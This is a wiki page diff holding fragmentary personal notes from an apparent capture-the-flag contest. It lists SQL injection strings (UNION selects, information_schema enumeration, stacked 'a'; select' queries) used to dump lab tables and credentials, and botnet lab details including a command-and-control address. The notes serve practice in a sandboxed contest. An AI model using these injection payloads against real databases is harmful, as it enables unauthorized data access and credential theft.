hacking:contest
Differences
This shows you the differences between two versions of the page.
| Next revision | Previous revision | ||
| hacking:contest [2020/04/15 12:03] – created peter | hacking:contest [2020/07/15 09:30] (current) – external edit 127.0.0.1 | ||
|---|---|---|---|
| Line 1: | Line 1: | ||
| ====== Hacking - Contest ====== | ====== Hacking - Contest ====== | ||
| + | |||
| + | ================================== | ||
| + | |||
| + | SQL INJECTION | ||
| + | |||
| + | ================================== | ||
| + | |||
| + | select TABLE_NAME, TABLE_SCHEMA from information_schema.tables; | ||
| + | |||
| + | select TABLE_NAME, COLUMN_NAME from information_schema.columns; | ||
| + | |||
| + | select last_name, first_name from users union select 1,2; | ||
| + | |||
| + | select last_name, first_name from users union select version(), | ||
| + | |||
| + | select * from users union select 1, | ||
| + | |||
| + | select * from dvla.users union select TABLE_NAME, COLUMN_NAME, | ||
| + | |||
| + | select first_name, last_name from dvwa.users where user_id = 1; | ||
| + | |||
| + | username = " | ||
| + | password = " | ||
| + | |||
| + | email address = " | ||
| + | |||
| + | |||
| + | username = " | ||
| + | |||
| + | |||
| + | Order number = 4 | ||
| + | Name of first order = DDOSXXL | ||
| + | |||
| + | |||
| + | db = dbm | ||
| + | one table = bkeys | ||
| + | |||
| + | Goto shop | ||
| + | |||
| + | a'; select TABLE_NAME, TABLE_SCHEMA from information_schema.tables; | ||
| + | |||
| + | a'; select TABLE_NAME, COLUMN_NAME from information_schema.columns; | ||
| + | shows bkeys table has 2 columns - id and backup_key | ||
| + | |||
| + | a'; select * from dbm.bkeys where id=1; | ||
| + | shows backup_key = horsebatterystablecorrect | ||
| + | |||
| + | a'; select 1, TABLE_NAME, TABLE_SCHEMA from information_schema.tables; | ||
| + | shows db=cyber with one of its table = shop_users; | ||
| + | |||
| + | a'; select TABLE_NAME, COLUMN_NAME from information_schema.columns; | ||
| + | shows table shop_users with columns id, username, password, email, role | ||
| + | |||
| + | a'; select * from cyber.shop_users; | ||
| + | user = " | ||
| + | password=" | ||
| + | |||
| + | |||
| + | |||
| + | ssh admin@support.dbm.hl | ||
| + | |||
| + | Killing this host...Great job. The key is: YOUROCK | ||
| + | |||
| + | |||
| + | |||
| + | |||
| + | ================================== | ||
| + | |||
| + | BOTNET | ||
| + | |||
| + | ================================== | ||
| + | |||
| + | PORT 1777 | ||
| + | ROUTER 192.168.6.254 | ||
| + | 192.168.6.0/ | ||
| + | 192.168.6.66 = COMMMAND and CONTROL CENTRE | ||
| + | |||
| + | Bypass login | ||
| + | How can I control the bots? | ||
| + | |||
| + | |||
| + | Please enter your name as an Alantean Cyber Security Squad member: JanD | ||
| + | |||
| + | |||
| + | How many drones does altantis have (https:// | ||
| + | how many drones are there on the droneboard (Droneboard) 11 | ||
| + | How many minutes does the UUV have to be submerged (https:// | ||
| + | How many minutes does it take for the UUV to transmit data to HQ? (atl-tech.atl) 10 | ||
| + | What type of log can you see in the Admin Panel Menu (Admin panel and atl-tech, | ||
| + | In what state does the autopilot have to be in order for the drones to submerge automatically? | ||
| + | |||
| + | |||
hacking/contest.1586952222.txt.gz · Last modified: 2020/07/15 09:30 (external edit)